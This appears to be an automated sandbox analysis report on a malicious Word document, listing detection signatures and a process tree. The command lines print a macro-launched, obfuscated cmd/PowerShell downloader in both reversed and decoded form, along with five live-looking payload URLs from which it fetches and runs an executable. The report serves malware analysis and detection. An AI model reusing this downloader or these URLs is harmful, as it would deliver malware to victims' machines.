Edit tour
Windows
Analysis Report
index.html.docx
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains OLE streams with names of living off the land binaries
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Microsoft Office Child Process
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w11x64_office
- WINWORD.EXE (PID: 3308 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Root\ Office16\W INWORD.EXE " /Automat ion -Embed ding MD5: A9F0EC89897AC6C878D217DFB64CA752) - cmd.exe (PID: 6988 cmdline:
C:\Windows \System32\ cmd.exe /c %PrOGramD aTA:~0,1%% PrOgRAMDat a:~9,2% / V:/C "SET 4r5f=;'97 3s'=513M$} }{hctac}}; kaerb;'610 z'=985j$;5 87E$ metI- ekovnI{ )0 0008 eg- h tgnel.)587 E$ metI-te G(( fI;'16 2P'=001F$; )587E$ ,25 5s$(eliFda olnwoD.526 W${yrt{)07 0D$ ni 255 s$(hcaerof ;'exe.'+15 7v$+'\'+pm et:vne$=58 7E$;'591v' =959n$;'19 9' = 157v$ ;'240r'=98 4N$;)'@'(t ilpS.'nFZi zYWaC_i20s /moc.orptn errotu//:p tth@34Of_u mYVd/rb.mo c.soirosse calativ//: ptth@2A7Ld Mv_EPYt7ks 6/rb.moc.a irahnegnep p//:ptth@K PZG_15j5pQ /moc.stfar ctranonub/ /:ptth@TnJ 3jVyNh_Ze3 8d/moc.par cynnhoj//: ptth'=070D $;tneilCbe W.teN tcej bo-wen=526 W$;'190h'= 578J$ ll%1 ,3-~:PMET% h%1,4-~:EM ANNOISSES% r%1,5~:CIL BUP%wop&& for /L %9 IN ( 560, -1 , 0)D O SEt WS Eu=!WSEu!! 4r5f:~ %9, 1!& If %9 eQU 0 ECH o !WSEu:~ 6! | FOR /F "tokens =2 delims= Nfah=" %B IN ('assoc .cmd')DO % B " MD5: 428CEC6B0034E0F183EB5BAE887BE480) - conhost.exe (PID: 7692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 9698384842DA735D80D278A427A229AB) - cmd.exe (PID: 5572 cmdline:
CmD /V:/C "SET 4r5 f=;'973s'= 513M$}}{hc tac}};kaer b;'610z'=9 85j$;587E$ metI-ekov nI{ )00008 eg- htgne l.)587E$ m etI-teG(( fI;'162P'= 001F$;)587 E$ ,255s$( eliFdaolnw oD.526W${y rt{)070D$ ni 255s$(h caerof;'ex e.'+157v$+ '\'+pmet:v ne$=587E$; '591v'=959 n$;'199' = 157v$;'24 0r'=984N$; )'@'(tilpS .'nFZizYWa C_i20s/moc .orptnerro tu//:ptth@ 34Of_umYVd /rb.moc.so irossecala tiv//:ptth @2A7LdMv_E PYt7ks6/rb .moc.airah negnepp//: ptth@KPZG_ 15j5pQ/moc .stfarctra nonub//:pt th@TnJ3jVy Nh_Ze38d/m oc.parcynn hoj//:ptth '=070D$;tn eilCbeW.te N tcejbo-w en=526W$;' 190h'=578J $ ll%1,3-~ :PMET%h%1, 4-~:EMANNO ISSES%r%1, 5~:CILBUP% wop&& for /L %9 IN ( 560, -1 , 0)DO S Et WSEu=! WSEu!!4r5f :~ %9, 1!& If %9 eQU 0 ECHo !W SEu:~ 6! | FOR /F " tokens=2 d elims=Nfah =" %B IN ( 'assoc.cmd ')DO %B " MD5: 428CEC6B0034E0F183EB5BAE887BE480) - cmd.exe (PID: 5024 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" EC Ho pow%PUB LIC:~5,1%r %SESSIONNA ME:~-4,1%h %TEMP:~-3, 1%ll $J875 ='h091';$W 625=new-ob ject Net.W ebClient;$ D070='http ://johnnyc rap.com/d8 3eZ_hNyVj3 JnT@http:/ /bunonartc rafts.com/ Qp5j51_GZP K@http://p pengenhari a.com.br/6 sk7tYPE_vM dL7A2@http ://vitalac essorios.c om.br/dVYm u_fO43@htt p://utorre ntpro.com/ s02i_CaWYz iZFn'.Spli t('@');$N4 89='r042'; $v751 = '9 91';$n959= 'v195';$E7 85=$env:te mp+'\'+$v7 51+'.exe'; foreach($s 552 in $D0 70){try{$W 625.Downlo adFile($s5 52, $E785) ;$F100='P2 61';If ((G et-Item $E 785).lengt h -ge 8000 0) {Invoke -Item $E78 5;$j589='z 016';break ;}}catch{} }$M315='s3 79'; " MD5: 428CEC6B0034E0F183EB5BAE887BE480) - cmd.exe (PID: 5036 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" FO R /F "toke ns=2 delim s=Nfah=" % B IN ('ass oc.cmd') D O %B " MD5: 428CEC6B0034E0F183EB5BAE887BE480) - cmd.exe (PID: 7584 cmdline:
C:\Windows \system32\ cmd.exe /c assoc.cmd MD5: 428CEC6B0034E0F183EB5BAE887BE480) - cmd.exe (PID: 5680 cmdline:
cmd MD5: 428CEC6B0034E0F183EB5BAE887BE480)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |